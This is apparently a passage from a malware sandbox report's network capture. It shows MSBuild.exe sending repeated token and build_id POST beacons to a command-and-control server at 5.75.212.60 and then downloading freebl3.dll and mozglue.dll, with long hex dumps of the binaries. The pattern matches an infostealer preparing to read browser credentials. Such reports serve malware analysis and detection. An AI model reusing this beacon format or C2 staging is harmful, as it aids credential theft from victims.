                                                                                      2024-07-26 01:18:04 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------EHDGCGIDAKEBKECAFIEHCont
                                                                                      2024-07-26 01:18:05 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.4497395.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:05 UTC323OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 1529
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:05 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------JKJDBAAAEHIEGCAKFHCGCont
                                                                                      2024-07-26 01:18:06 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:06 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.4497405.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:06 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 437
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:06 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------AAAAAAAAAAAAAAAAAAAACont
                                                                                      2024-07-26 01:18:07 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.4497415.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:07 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 437
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:07 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------BFCFBFBFBKFIDHJKFCAFCont
                                                                                      2024-07-26 01:18:08 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:08 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.4497435.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:08 UTC241OUTGET /freebl3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:09 UTC260INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:08 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 685392
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:08 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:09 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3
                                                                                      Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90
                                                                                      Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f
                                                                                      Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89
                                                                                      Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                                      Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                                      Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                                      Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                                      Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                      2024-07-26 01:18:09 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5
                                                                                      Data Ascii: ,0<48%8A)$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.4497475.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:10 UTC241OUTGET /mozglue.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:10 UTC260INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:10 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 608080
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:10 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:10 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                      2024-07-26 01:18:10 UTC16384INData Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46
                                                                                      Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPF
